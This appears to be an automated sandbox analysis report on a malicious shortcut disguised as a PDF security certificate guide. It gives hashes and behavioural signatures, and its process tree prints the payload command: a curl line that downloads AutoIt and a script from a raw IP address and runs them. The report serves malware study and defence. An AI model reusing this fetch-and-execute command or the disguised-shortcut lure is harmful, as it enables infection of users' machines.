Analysis

max time kernel: 122s
max time network: 125s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted: 14/09/2023, 12:33
Static task: static1

Behavioral task: behavioral1
  Sample: Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
  Resource: win7-20230831-en

Behavioral task: behavioral2
  Sample: Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
  Resource: win10v2004-20230831-en

Behavioral task: behavioral3
  Sample: Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
  Resource: macos-20230831-en

Behavioral task: behavioral4
  Sample: Security Certificate Update Guide.pdf.lnk
  Resource: win7-20230831-en

Behavioral task: behavioral5
  Sample: Security Certificate Update Guide.pdf.lnk
  Resource: win10v2004-20230831-en

Behavioral task: behavioral6
  Sample: Security Certificate Update Guide.pdf.lnk
  Resource: macos-20230831-en
General

Target: Security Certificate Update Guide.pdf.lnk
Size: 1KB
MD5: 3fb9fd77754aa0c99c7d7d1a71bc4216
SHA1: af30bf87d826912b06b62306864eb0bb5701636e
SHA256: aa82b70acc6f8acb4fefa6ca5af6cbd3b33cc18801e2d205c05d182553812309
SHA512: f8ac10c231f8ffe9e1e0e7456ba718bca35fa0a0cd1e8dad9d0267549567c6861261e677c1478c62096bfe3371aa4e11bc8f34037e74b97800339f6661002b1d
Malware Config

Signatures

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   Process   procid_target
  PID 2980 wrote to memory of 2748   2980  cmd.exe   29
  PID 2980 wrote to memory of 2748   2980  cmd.exe   29
  PID 2980 wrote to memory of 2748   2980  cmd.exe   29
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Security Certificate Update Guide.pdf.lnk"
   PID: 2980
   Signature: Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe (process tree level 2, spawned under PID 2980)
      Command line: "C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "http://5.188.87.58:2351" -o "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" "http://5.188.87.58:2351/msibmyzwoxl" & "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" & exit
      PID: 2748